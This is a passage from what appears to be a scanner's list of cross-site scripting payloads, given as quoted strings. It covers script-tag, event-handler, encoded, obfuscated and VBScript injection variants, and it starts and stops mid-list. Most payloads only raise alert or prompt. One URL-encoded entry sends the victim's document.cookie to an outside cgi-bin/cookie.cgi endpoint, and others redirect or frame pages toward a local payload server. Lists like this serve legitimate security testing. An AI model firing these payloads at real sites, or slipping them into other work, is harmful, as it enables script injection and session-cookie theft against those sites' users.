onmouseover="\\x6A\\x61\\x76\\x61\\x53\\x43\\x52\\x49\\x50\\x54\\x26\\x63\\x6F\\x6C\\x6F\\x6E\\x3B\\x63\\x6F\\x6E\\x66\\x69\\x72\\x6D\\x26\\x6C\\x70\\x61\\x72\\x3B\\x31\\x26\\x72\\x70\\x61\\x72\\x3B">Save</command>', '"><command onmouseover="\\x6A\\x61\\x76\\x61\\x53\\x43\\x52\\x49\\x50\\x54\\x26\\x63\\x6F\\x6C\\x6F\\x6E\\x3B\\x63\\x6F\\x6E\\x66\\x69\\x72\\x6D\\x26\\x6C\\x70\\x61\\x72\\x3B\\x31\\x26\\x72\\x70\\x61\\x72\\x3B">Save</command>', '\'><command onmouseover="\\x6A\\x61\\x76\\x61\\x53\\x43\\x52\\x49\\x50\\x54\\x26\\x63\\x6F\\x6C\\x6F\\x6E\\x3B\\x63\\x6F\\x6E\\x66\\x69\\x72\\x6D\\x26\\x6C\\x70\\x61\\x72\\x3B\\x31\\x26\\x72\\x70\\x61\\x72\\x3B">Save</command>', '<q/oncut=alert(1)>', '"><q/oncut=alert(1)>', "'><q/oncut=alert(1)>", 'eval("aler"+(!![]+[])[+[]])("X")', 'window["alert"]("X")', "this['ale'+(!![]+[])[-~[]]+(!![]+[])[+[]]]()", '< %3C &lt &lt; &LT &LT; &#60 &#060 &#0060 &#00060 &#000060 &#0000060 &#60; &#060; &#0060; &#00060; &#000060; &#0000060; &#x3c &#x03c &#x003c &#x0003c &#x00003c &#x000003c &#x3c; &#x03c; &#x003c; &#x0003c; &#x00003c; &#x000003c; &#X3c &#X03c &#X003c &#X0003c &#X00003c &#X000003c &#X3c; &#X03c; &#X003c; &#X0003c; &#X00003c; &#X000003c; &#x3C &#x03C &#x003C &#x0003C &#x00003C &#x000003C &#x3C; &#x03C; &#x003C; &#x0003C; &#x00003C; &#x000003C; &#X3C &#X03C &#X003C &#X0003C &#X00003C &#X000003C &#X3C; &#X03C; &#X003C; &#X0003C; &#X00003C; &#X000003C; \\x3c \\x3C \\u003c \\u003C', '">< %3C &lt &lt; &LT &LT; &#60 &#060 &#0060 &#00060 &#000060 &#0000060 &#60; &#060; &#0060; &#00060; &#000060; &#0000060; &#x3c &#x03c &#x003c &#x0003c &#x00003c &#x000003c &#x3c; &#x03c; &#x003c; &#x0003c; &#x00003c; &#x000003c; &#X3c &#X03c &#X003c &#X0003c &#X00003c &#X000003c &#X3c; &#X03c; &#X003c; &#X0003c; &#X00003c; &#X000003c; &#x3C &#x03C &#x003C &#x0003C &#x00003C &#x000003C &#x3C; &#x03C; &#x003C; &#x0003C; &#x00003C; &#x000003C; &#X3C &#X03C &#X003C &#X0003C &#X00003C &#X000003C &#X3C; &#X03C; &#X003C; &#X0003C; &#X00003C; &#X000003C; \\x3c \\x3C \\u003c \\u003C', "'>< %3C &lt &lt; &LT &LT; &#60 &#060 &#0060 &#00060 &#000060 &#0000060 &#60; &#060; &#0060; &#00060; &#000060; &#0000060; &#x3c &#x03c &#x003c &#x0003c &#x00003c &#x000003c &#x3c; &#x03c; &#x003c; &#x0003c; &#x00003c; &#x000003c; &#X3c &#X03c &#X003c &#X0003c &#X00003c &#X000003c &#X3c; &#X03c; &#X003c; &#X0003c; &#X00003c; &#X000003c; &#x3C &#x03C &#x003C &#x0003C &#x00003C &#x000003C &#x3C; &#x03C; &#x003C; &#x0003C; &#x00003C; &#x000003C; &#X3C &#X03C &#X003C &#X0003C &#X00003C &#X000003C &#X3C; &#X03C; &#X003C; &#X0003C; &#X00003C; &#X000003C; \\x3c \\x3C \\u003c \\u003C", '<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">X</A>', '"><A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">X</A>', '\'><A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">X</A>', '<A HREF="http://1113982867/">X</A>', '"><A HREF="http://1113982867/">X</A>', '\'><A HREF="http://1113982867/">X</A>', '<A HREF="h tt\tp://6&#09;6.000146.0x7.147/">X</A>', '"><A HREF="h tt\tp://6&#09;6.000146.0x7.147/">X</A>', '\'><A HREF="h tt\tp://6&#09;6.000146.0x7.147/">X</A>', '<A HREF="//google">X</A>', '"><A HREF="//google">X</A>', '\'><A HREF="//google">X</A>', '<A HREF="http://127.0.0.1:3555/xss_serve_payloads/X.html@google">X</A', '"><A HREF="http://127.0.0.1:3555/xss_serve_payloads/X.html@google">X</A', '\'><A HREF="http://127.0.0.1:3555/xss_serve_payloads/X.html@google">X</A', '<A HREF="http://google:127.0.0.1:3555/xss_serve_payloads/X.html">X</A>', '"><A HREF="http://google:127.0.0.1:3555/xss_serve_payloads/X.html">X</A>', '\'><A HREF="http://google:127.0.0.1:3555/xss_serve_payloads/X.html">X</A>', 'document.write(\'<iframe src="http://127.0.0.1:3555/xss_serve_payloads/X.html" style="border: 0; width: 100%; height: 100%"></iframe>\')', 'http://%22%20onerror=%22alert%281%29;//', "document.location='http://127.0.0.1:3555/xss_serve_payloads/X.html'", 'document.location="http://127.0.0.1:3555/xss_serve_payloads/X.html"', '\\"><script>alert(/X/)<script>', ';alert%28String.fromCharCode%2875,67,70%29%29//\\%27;alert%28String.fromCharCode%2875,67,70%29%29//%22;alert%28String.fromCharCode%2875,67,70%29%29//\\%22;alert%28String.fromCharCode%2875,67,70%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2875,67,70%29%29%3C/SCRIPT%3E', '<input onfocus=write(1) autofocus>', '"><input onfocus=write(1) autofocus>', "'><input onfocus=write(1) autofocus>", '<video poster=javascript:alert(1)//></video>', '"><video poster=javascript:alert(1)//></video>', "'><video poster=javascript:alert(1)//></video>", '<video poster=prompt(1)//></video>', '"><video poster=prompt(1)//></video>', "'><video poster=prompt(1)//></video>", '<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>', '"><body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>', "'><body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>", '<body onscroll=prompt(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>', '"><body onscroll=prompt(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>', "'><body onscroll=prompt(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>", '<form id=test onforminput=prompt(1)><input></form><button form=test onformchange=prompt(2)>X</button>', '"><form id=test onforminput=prompt(1)><input></form><button form=test onformchange=prompt(2)>X</button>', "'><form id=test onforminput=prompt(1)><input></form><button form=test onformchange=prompt(2)>X</button>", '<video><source onerror="alert(1)">', '"><video><source onerror="alert(1)">', '\'><video><source onerror="alert(1)">', '<video><source onerror="prompt(1)">', '"><video><source onerror="prompt(1)">', '\'><video><source onerror="prompt(1)">', '<video><source onerror="prompt(1)">', '"><video><source onerror="prompt(1)">', '\'><video><source onerror="prompt(1)"></source></video>', '"><video><source onerror="prompt(1)"></source></video>', '\'><video><source onerror="prompt(1)"></source></video>', '<form><button formaction="javascript:alert(1)">X</button>', '"><form><button formaction="javascript:alert(1)">X</button>', '\'><form><button formaction="javascript:alert(1)">X</button>', '<body oninput=alert(1)><input autofocus>', '"><body oninput=alert(1)><input autofocus>', "'><body oninput=alert(1)><input autofocus>", '<body oninput=prompt(1)><input autofocus>', '"><body oninput=prompt(1)><input autofocus>', "'><body oninput=prompt(1)><input autofocus>", '<frameset onload=prompt(1)>', '"><frameset onload=prompt(1)>', "'><frameset onload=prompt(1)>", '<comment><img src="</comment><img src=x onerror=alert(1)//">', '"><comment><img src="</comment><img src=x onerror=alert(1)//">', '\'><comment><img src="</comment><img src=x onerror=alert(1)//">', '<comment><img src="</comment><img src=x onerror=prompt(1)//">', '"><comment><img src="</comment><img src=x onerror=prompt(1)//">', '\'><comment><img src="</comment><img src=x onerror=prompt(1)//">', '<style><img src="</style><img src=x onerror=prompt(1)//">', '"><style><img src="</style><img src=x onerror=prompt(1)//">', '\'><style><img src="</style><img src=x onerror=prompt(1)//">', '<SCRIPT FOR=document EVENT=onreadystatechange>prompt(1)</SCRIPT>', '"><SCRIPT FOR=document EVENT=onreadystatechange>prompt(1)</SCRIPT>', "'><SCRIPT FOR=document EVENT=onreadystatechange>prompt(1)</SCRIPT>", '<div style=width:1px;filter:glow onfilterchange=prompt(1)>x</div>', '"><div style=width:1px;filter:glow onfilterchange=prompt(1)>x</div>', "'><div style=width:1px;filter:glow onfilterchange=prompt(1)>x</div>", '<img[a][b]src=x[d]onerror[c]=[e]"prompt(1)">', '"><img[a][b]src=x[d]onerror[c]=[e]"prompt(1)">', '\'><img[a][b]src=x[d]onerror[c]=[e]"prompt(1)">', "'-prompt(1)'", "'-alert(1)-'", '\';alert(String.fromCharCode(75,67,70))//\';alert(String.fromCharCode(75,67,70))//";', 'alert(String.fromCharCode(75,67,70))//";alert(String.fromCharCode(75,67,70))//--></SCRIPT>">\'><SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>', '<IMG SRC=# onmouseover="alert(\'X\')">', '"><IMG SRC=# onmouseover="alert(\'X\')">', '\'><IMG SRC=# onmouseover="alert(\'X\')">', '<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>', '"><IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>', "'><IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>", '<IMG SRC="jav&#x0A;ascript:alert(\'X\');">', '"><IMG SRC="jav&#x0A;ascript:alert(\'X\');">', '\'><IMG SRC="jav&#x0A;ascript:alert(\'X\');">', 'exp/*<A STYLE=\'no\\X:noX("*//*");X:ex/*X*//*/*/pression(alert("X"))\'>', '\'"--></style></script><script>alert("X")</script>', '\'"--></style></script><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', '"><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', "'><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', '"></script><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', '"><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', "'><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', "'></script><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', '"><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', "'><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', '&\'"><script>alert(/X/)</script>', '</ScrIpt><script>alert(/X/)</script>', '"><script>alert(/X/)</script>', '</ScrIpt><script>alert(/X/)</script>', "'><script>alert(/X/)</script>", '</ScrIpt><script>alert(/X/)</script>', "%26'%22%3E%3Cscript%3Ealert(%2FX%2F)%3C%2Fscript%3E%3D", '&\'">PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4', '&\'">/\'-C<FEP=#YA;&5R="@O>\'-S+RD\\+W-C<FEP=#.', '&\'">\\u{3c}\\u{73}\\u{63}\\u{72}\\u{69}\\u{70}\\u{74}\\u{3e}\\u{61}\\u{6c}\\u{65}\\u{72}\\u{74}\\u{28}\\u{2f}\\u{78}\\u{73}\\u{73}\\u{2f}\\u{29}\\u{3c}\\u{2f}\\u{73}\\u{63}\\u{72}\\u{69}\\u{70}\\u{74}\\u{3e}', '&\'">\\u003c\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003e\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u002f\\u0078\\u0073\\u0073\\u002f\\u0029\\u003c\\u002f\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074\\u003e', '&\'">0x3c7363726970743e616c657274282f7873732f293c2f7363726970743e', '&\'">-1,54,38,53,44,51,55,-1,36,47,40,53,55,-1,-1,59,54,54,-1,-1,-1,-1,54,38,53,44,51,55,-1', '&\'">PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==', '&\'">3e7470697263732f3c292f7373782f287472656c613e7470697263733c', '&\'">chr(60).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(62).chr(97).chr(108).chr(101).chr(114).chr(116).chr(40).chr(47).chr(120).chr(115).chr(115).chr(47).chr(41).chr(60).chr(47).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(62)', '&\'">TypeError: Cannot read property \'$content$\' of undefined', '&\'">\\74\\163\\143\\162\\151\\160\\164\\76\\141\\154\\145\\162\\164\\50\\57\\170\\163\\163\\57\\51\\74\\57\\163\\143\\162\\151\\160\\164\\76', '&\'"><script>alert(/X/)</???>', '&\'">%u003c%u0073%u0063%u0072%u0069%u0070%u0074%u003e%u0061%u006c%u0065%u0072%u0074%u0028%u002f%u0078%u0073%u0073%u002f%u0029%u003c%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u003e', '&\'">\\uff1c\\uff53\\uff43\\uff52\\uff49\\uff50\\uff54\\uff1e\\uff41\\uff4c\\uff45\\uff52\\uff54\\uff08\\uff0f\\uff58\\uff53\\uff53\\uff0f\\uff09\\uff1c\\uff0f\\uff53\\uff43\\uff52\\uff49\\uff50\\uff54\\uff1e', '&\'">&lt;script&gt;alert&lpar;&sol;X&sol;&rpar;&lt;&sol;script&gt;', '&\'">&lt;script&gt;alert(/X/)&lt;/script&gt;', '&\'">Description:Syntax error Msg:Unexpected token < )', '</script><svg onload=\'-/"/-alert(1)//\'>', '"></script><svg onload=\'-/"/-alert(1)//\'>', '\'></script><svg onload=\'-/"/-alert(1)//\'>', '<!-- --!><script>alert(X)</script>-->', '"><!-- --!><script>alert(X)</script>-->', "'><!-- --!><script>alert(X)</script>-->", '<![CDATA[<script>alert(X)</script>]]>', '"><![CDATA[<script>alert(X)</script>]]>', "'><![CDATA[<script>alert(X)</script>]]>", '[data "1<div style=width:expression(prompt(1))>"]', '+onerror=alert(1)%3E/', '+onerror=prompt(1)%3E/', '?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e', '?#?gad=xxxx"onload="alert(1)"', '#?gad=xxxx"onload="alert(1)"', '/#?gad=xxxx"onload="alert(1)"', '?><script >alert(1)</script >', '?><ScRiPt>alert(1)</ScRiPt>', '?%3e%3cscript%3ealert(1)%3c/script%3e', '?><scr<script>ipt>alert(1)</scr</script>ipt>', '"><scr<script>ipt>alert(1)</scr</script>ipt>', "'><scr<script>ipt>alert(1)</scr</script>ipt>", '%00?><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', '<xml onreadystatechange=alert(1)>', '"><xml onreadystatechange=alert(1)>', "'><xml onreadystatechange=alert(1)>", '<style onreadystatechange=alert(1)>', '"><style onreadystatechange=alert(1)>', "'><style onreadystatechange=alert(1)>", '<iframe onreadystatechange=alert(1)>', '"><iframe onreadystatechange=alert(1)>', "'><iframe onreadystatechange=alert(1)>", '<object onerror=alert(1)>', '"><object onerror=alert(1)>', "'><object onerror=alert(1)>", '<object type=image src=X.gif onreadystatechange=alert(1)></object>', '"><object type=image src=X.gif onreadystatechange=alert(1)></object>', "'><object type=image src=X.gif onreadystatechange=alert(1)></object>", '<img type=image src=X.gif onreadystatechange=alert(1)>', '"><img type=image src=X.gif onreadystatechange=alert(1)>', "'><img type=image src=X.gif onreadystatechange=alert(1)>", '<input type=image src=X.gif onreadystatechange=alert(1)>', '"><input type=image src=X.gif onreadystatechange=alert(1)>', "'><input type=image src=X.gif onreadystatechange=alert(1)>", '<isindex type=image src=X.gif onreadystatechange=alert(1)>', '"><isindex type=image src=X.gif onreadystatechange=alert(1)>', "'><isindex type=image src=X.gif onreadystatechange=alert(1)>", '<script onreadystatechange=alert(1)>', '"><script onreadystatechange=alert(1)>', "'><script onreadystatechange=alert(1)>", '<bgsound onpropertychange=alert(1)>', '"><bgsound onpropertychange=alert(1)>', "'><bgsound onpropertychange=alert(1)>", '<body onbeforeactivate=alert(1)>', '"><body onbeforeactivate=alert(1)>', "'><body onbeforeactivate=alert(1)>", '<body onactivate=alert(1)>', '"><body onactivate=alert(1)>', "'><body onactivate=alert(1)>", '<body onfocusin=alert(1)>', '"><body onfocusin=alert(1)>', "'><body onfocusin=alert(1)>", '<input onblur=alert(1) autofocus><input autofocus>', '"><input onblur=alert(1) autofocus><input autofocus>', "'><input onblur=alert(1) autofocus><input autofocus>", '<body onscroll=alert(1)><br><br>...<br><input autofocus>', '"><body onscroll=alert(1)><br><br>...<br><input autofocus>', "'><body onscroll=alert(1)><br><br>...<br><input autofocus>", '</a onmousemove=alert(1)>', '"></a onmousemove=alert(1)>', "'></a onmousemove=alert(1)>", '<video src=1 onerror=alert(1)>', '"><video src=1 onerror=alert(1)>', "'><video src=1 onerror=alert(1)>", '<audio src=1 onerror=alert(1)>', '"><audio src=1 onerror=alert(1)>', "'><audio src=1 onerror=alert(1)>", '<object data=javascript:alert(1)>', '"><object data=javascript:alert(1)>', "'><object data=javascript:alert(1)>", '<iframe src=javascript:alert(1)>', '"><iframe src=javascript:alert(1)>', "'><iframe src=javascript:alert(1)>", '<embed src=javascript:alert(1)>', '"><embed src=javascript:alert(1)>', "'><embed src=javascript:alert(1)>", '<form id=test /><button form=test formaction=javascript:alert(1)>', '"><form id=test /><button form=test formaction=javascript:alert(1)>', "'><form id=test /><button form=test formaction=javascript:alert(1)>", '<event-source src=javascript:alert(1)>', '"><event-source src=javascript:alert(1)>', "'><event-source src=javascript:alert(1)>", '<x style=x:expression(alert(1))>', '"><x style=x:expression(alert(1))>', "'><x style=x:expression(alert(1))>", '<x style=behavior:url(#default#time2) onbegin=alert(1)>', '"><x style=behavior:url(#default#time2) onbegin=alert(1)>', "'><x style=behavior:url(#default#time2) onbegin=alert(1)>", '<iMg onerror=alert(1) src=a>', '"><iMg onerror=alert(1) src=a>', "'><iMg onerror=alert(1) src=a>", '<[%00]img onerror=alert(1) src=a>', '"><[%00]img onerror=alert(1) src=a>', "'><[%00]img onerror=alert(1) src=a>", '<i[%00]mg onerror=alert(1) src=a>', '"><i[%00]mg onerror=alert(1) src=a>', "'><i[%00]mg onerror=alert(1) src=a>", '<img/onerror=alert(1) src=a>', '"><img/onerror=alert(1) src=a>', "'><img/onerror=alert(1) src=a>", '<img[%09]onerror=alert(1) src=a>', '"><img[%09]onerror=alert(1) src=a>', "'><img[%09]onerror=alert(1) src=a>", '<img[%0d]onerror=alert(1) src=a>', '"><img[%0d]onerror=alert(1) src=a>', "'><img[%0d]onerror=alert(1) src=a>", '<img[%0a]onerror=alert(1) src=a>', '"><img[%0a]onerror=alert(1) src=a>', "'><img[%0a]onerror=alert(1) src=a>", '<img/?onerror=alert(1) src=a>', '"><img/?onerror=alert(1) src=a>', "'><img/?onerror=alert(1) src=a>", '"><img/?onerror=alert(1) src=a>', '"><img/?onerror=alert(1) src=a>', "'><img/?onerror=alert(1) src=a>", "'><img/?onerror=alert(1) src=a>", '"><img/?onerror=alert(1) src=a>', "'><img/?onerror=alert(1) src=a>", '<img/?onerror=alert(1) src=a>', '"><img/?onerror=alert(1) src=a>', "'><img/?onerror=alert(1) src=a>", '"><img/?onerror=alert(1) src=a>', '"><img/?onerror=alert(1) src=a>', "'><img/?onerror=alert(1) src=a>", "'><img/?onerror=alert(1) src=a>", '"><img/?onerror=alert(1) src=a>', "'><img/?onerror=alert(1) src=a>", '<img/anyjunk/onerror=alert(1) src=a>', '"><img/anyjunk/onerror=alert(1) src=a>', "'><img/anyjunk/onerror=alert(1) src=a>", '<img o[%00]nerror=alert(1) src=a>', '"><img o[%00]nerror=alert(1) src=a>', "'><img o[%00]nerror=alert(1) src=a>", '<i[%00]m[%00]g o[%00]ner[%00]r[%00]or[%00]=a[%00]ler[%00]t(1) sr[%00]c=[%00]a>', '"><i[%00]m[%00]g o[%00]ner[%00]r[%00]or[%00]=a[%00]ler[%00]t(1) sr[%00]c=[%00]a>', "'><i[%00]m[%00]g o[%00]ner[%00]r[%00]or[%00]=a[%00]ler[%00]t(1) sr[%00]c=[%00]a>", '<img onerror=?alert(1)?src=a>', '"><img onerror=?alert(1)?src=a>', "'><img onerror=?alert(1)?src=a>", '"><img onerror=?alert(1)?src=a>', '"><img onerror=?alert(1)?src=a>', "'><img onerror=?alert(1)?src=a>", "'><img onerror=?alert(1)?src=a>", '"><img onerror=?alert(1)?src=a>', "'><img onerror=?alert(1)?src=a>", '<img onerror=?alert(1)?src=a>', '"><img onerror=?alert(1)?src=a>', "'><img onerror=?alert(1)?src=a>", '"><img onerror=?alert(1)?src=a>', '"><img onerror=?alert(1)?src=a>', "'><img onerror=?alert(1)?src=a>", "'><img onerror=?alert(1)?src=a>", '"><img onerror=?alert(1)?src=a>', "'><img onerror=?alert(1)?src=a>", '<img onerror=`alert(1)`src=a>', '"><img onerror=`alert(1)`src=a>', "'><img onerror=`alert(1)`src=a>", '<iframe src=j&#x61;vasc&#x72ipt&#x3a;alert&#x28;1&#x29; >', '"><iframe src=j&#x61;vasc&#x72ipt&#x3a;alert&#x28;1&#x29; >', "'><iframe src=j&#x61;vasc&#x72ipt&#x3a;alert&#x28;1&#x29; >", '<img onerror=a&#x06c;ert(1) src=a>', '"><img onerror=a&#x06c;ert(1) src=a>', "'><img onerror=a&#x06c;ert(1) src=a>", '<img onerror=a&#x006c;ert(1) src=a>', '"><img onerror=a&#x006c;ert(1) src=a>', "'><img onerror=a&#x006c;ert(1) src=a>", '<img onerror=a&#x0006c;ert(1) src=a>', '"><img onerror=a&#x0006c;ert(1) src=a>', "'><img onerror=a&#x0006c;ert(1) src=a>", '<img onerror=a&#108;ert(1) src=a>', '"><img onerror=a&#108;ert(1) src=a>', "'><img onerror=a&#108;ert(1) src=a>", '<img onerror=a&#0108;ert(1) src=a>', '"><img onerror=a&#0108;ert(1) src=a>', "'><img onerror=a&#0108;ert(1) src=a>", '<img onerror=a&#108ert(1) src=a>', '"><img onerror=a&#108ert(1) src=a>', "'><img onerror=a&#108ert(1) src=a>", '<img onerror=a&#0108ert(1) src=a>', '"><img onerror=a&#0108ert(1) src=a>', "'><img onerror=a&#0108ert(1) src=a>", '%253cimg%20onerror=alert(1)%20src=a%253e', '%3cimg onerror=alert(1) src=a%3e', '<img onerror=alert(1) src=a>', '"><img onerror=alert(1) src=a>', "'><img onerror=alert(1) src=a>", '?img onerror=alert(1) src=a?', '<script>a\\u006cert(1);</script>', '</ScrIpt><script>a\\u006cert(1);</script>', '"><script>a\\u006cert(1);</script>', '</ScrIpt><script>a\\u006cert(1);</script>', "'><script>a\\u006cert(1);</script>", '</ScrIpt><script>a\\u006cert(1);</script>', '<script>eval(?a\\u006cert(1)?);</script>', '</ScrIpt><script>eval(?a\\u006cert(1)?);</script>', '"><script>eval(?a\\u006cert(1)?);</script>', '</ScrIpt><script>eval(?a\\u006cert(1)?);</script>', "'><script>eval(?a\\u006cert(1)?);</script>", '</ScrIpt><script>eval(?a\\u006cert(1)?);</script>', '<script>eval(?a\\x6cert(1)?);</script>', '</ScrIpt><script>eval(?a\\x6cert(1)?);</script>', '"><script>eval(?a\\x6cert(1)?);</script>', '</ScrIpt><script>eval(?a\\x6cert(1)?);</script>', "'><script>eval(?a\\x6cert(1)?);</script>", '</ScrIpt><script>eval(?a\\x6cert(1)?);</script>', '<script>eval(?a\\154ert(1)?);</script>', '</ScrIpt><script>eval(?a\\154ert(1)?);</script>', '"><script>eval(?a\\154ert(1)?);</script>', '</ScrIpt><script>eval(?a\\154ert(1)?);</script>', "'><script>eval(?a\\154ert(1)?);</script>", '</ScrIpt><script>eval(?a\\154ert(1)?);</script>', '<script>eval(?a\\l\\ert\\(1\\)?);</script>', '</ScrIpt><script>eval(?a\\l\\ert\\(1\\)?);</script>', '"><script>eval(?a\\l\\ert\\(1\\)?);</script>', '</ScrIpt><script>eval(?a\\l\\ert\\(1\\)?);</script>', "'><script>eval(?a\\l\\ert\\(1\\)?);</script>", '</ScrIpt><script>eval(?a\\l\\ert\\(1\\)?);</script>', '<script>eval(?al?+?ert(1)?);</script>', '</ScrIpt><script>eval(?al?+?ert(1)?);</script>', '"><script>eval(?al?+?ert(1)?);</script>', '</ScrIpt><script>eval(?al?+?ert(1)?);</script>', "'><script>eval(?al?+?ert(1)?);</script>", '</ScrIpt><script>eval(?al?+?ert(1)?);</script>', '<script>eval(String.fromCharCode(75,67,70));</script>', '</ScrIpt><script>eval(String.fromCharCode(75,67,70));</script>', '"><script>eval(String.fromCharCode(75,67,70));</script>', '</ScrIpt><script>eval(String.fromCharCode(75,67,70));</script>', "'><script>eval(String.fromCharCode(75,67,70));</script>", '</ScrIpt><script>eval(String.fromCharCode(75,67,70));</script>', '<script>eval(atob(?amF2YXNjcmlwdDphbGVydCgxKQ?));</script>', '</ScrIpt><script>eval(atob(?amF2YXNjcmlwdDphbGVydCgxKQ?));</script>', '"><script>eval(atob(?amF2YXNjcmlwdDphbGVydCgxKQ?));</script>', '</ScrIpt><script>eval(atob(?amF2YXNjcmlwdDphbGVydCgxKQ?));</script>', "'><script>eval(atob(?amF2YXNjcmlwdDphbGVydCgxKQ?));</script>", '</ScrIpt><script>eval(atob(?amF2YXNjcmlwdDphbGVydCgxKQ?));</script>', '<script>?alert(1)?.replace(/.+/,eval)</script>', '</ScrIpt><script>?alert(1)?.replace(/.+/,eval)</script>', '"><script>?alert(1)?.replace(/.+/,eval)</script>', '</ScrIpt><script>?alert(1)?.replace(/.+/,eval)</script>', "'><script>?alert(1)?.replace(/.+/,eval)</script>", '</ScrIpt><script>?alert(1)?.replace(/.+/,eval)</script>', '<script>function::[?alert?](1)</script>', '</ScrIpt><script>function::[?alert?](1)</script>', '"><script>function::[?alert?](1)</script>', '</ScrIpt><script>function::[?alert?](1)</script>', "'><script>function::[?alert?](1)</script>", '</ScrIpt><script>function::[?alert?](1)</script>', '<img onerror=&#x65;&#x76;&#x61;&#x6c;&#x28;&#x27;al&#x5c;u0065rt&#x28;1&#x29;&#x27;&#x29; src=a>', '"><img onerror=&#x65;&#x76;&#x61;&#x6c;&#x28;&#x27;al&#x5c;u0065rt&#x28;1&#x29;&#x27;&#x29; src=a>', "'><img onerror=&#x65;&#x76;&#x61;&#x6c;&#x28;&#x27;al&#x5c;u0065rt&#x28;1&#x29;&#x27;&#x29; src=a>", '<script language=vbs>MsgBox 1</script>', '"><script language=vbs>MsgBox 1</script>', "'><script language=vbs>MsgBox 1</script>", '<img onerror=?vbs:MsgBox 1? src=a>', '"><img onerror=?vbs:MsgBox 1? src=a>', "'><img onerror=?vbs:MsgBox 1? src=a>", '<img onerror=MsgBox+1 language=vbs src=a>', '"><img onerror=MsgBox+1 language=vbs src=a>', "'><img onerror=MsgBox+1 language=vbs src=a>", '<SCRIPT LANGUAGE=VBS>MSGBOX 1</SCRIPT>', '"><SCRIPT LANGUAGE=VBS>MSGBOX 1</SCRIPT>', "'><SCRIPT LANGUAGE=VBS>MSGBOX 1</SCRIPT>", '<IMG ONERROR=?VBS:MSGBOX 1? SRC=A>', '"><IMG ONERROR=?VBS:MSGBOX 1? SRC=A>', "'><IMG ONERROR=?VBS:MSGBOX 1? SRC=A>", '<script>execScript(?MsgBox 1?,?vbscript?);</script>', '</ScrIpt><script>execScript(?MsgBox 1?,?vbscript?);</script>', '"><script>execScript(?MsgBox 1?,?vbscript?);</script>', '</ScrIpt><script>execScript(?MsgBox 1?,?vbscript?);</script>', "'><script>execScript(?MsgBox 1?,?vbscript?);</script>", '</ScrIpt><script>execScript(?MsgBox 1?,?vbscript?);</script>', '<script language=vbs>execScript(?alert(1)?)</script>', '"><script language=vbs>execScript(?alert(1)?)</script>', "'><script language=vbs>execScript(?alert(1)?)</script>", '<SCRIPT LANGUAGE=VBS>EXECSCRIPT(LCASE(?ALERT(1)?)) </SCRIPT>', '"><SCRIPT LANGUAGE=VBS>EXECSCRIPT(LCASE(?ALERT(1)?)) </SCRIPT>', "'><SCRIPT LANGUAGE=VBS>EXECSCRIPT(LCASE(?ALERT(1)?)) </SCRIPT>", '<IMG ONERROR=?VBS:EXECSCRIPT LCASE(?ALERT(1)?)? SRC=A>', '"><IMG ONERROR=?VBS:EXECSCRIPT LCASE(?ALERT(1)?)? SRC=A>', "'><IMG ONERROR=?VBS:EXECSCRIPT LCASE(?ALERT(1)?)? SRC=A>", '<img onerror=?VBScript.Encode:#@~^CAAAAA==\\ko$K6,FoQIAAA==^#~@? src=a>', '"><img onerror=?VBScript.Encode:#@~^CAAAAA==\\ko$K6,FoQIAAA==^#~@? src=a>', "'><img onerror=?VBScript.Encode:#@~^CAAAAA==\\ko$K6,FoQIAAA==^#~@? src=a>", '<img language=?JScript.Encode? onerror=?#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@? src=a>', '"><img language=?JScript.Encode? onerror=?#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@? src=a>', "'><img language=?JScript.Encode? 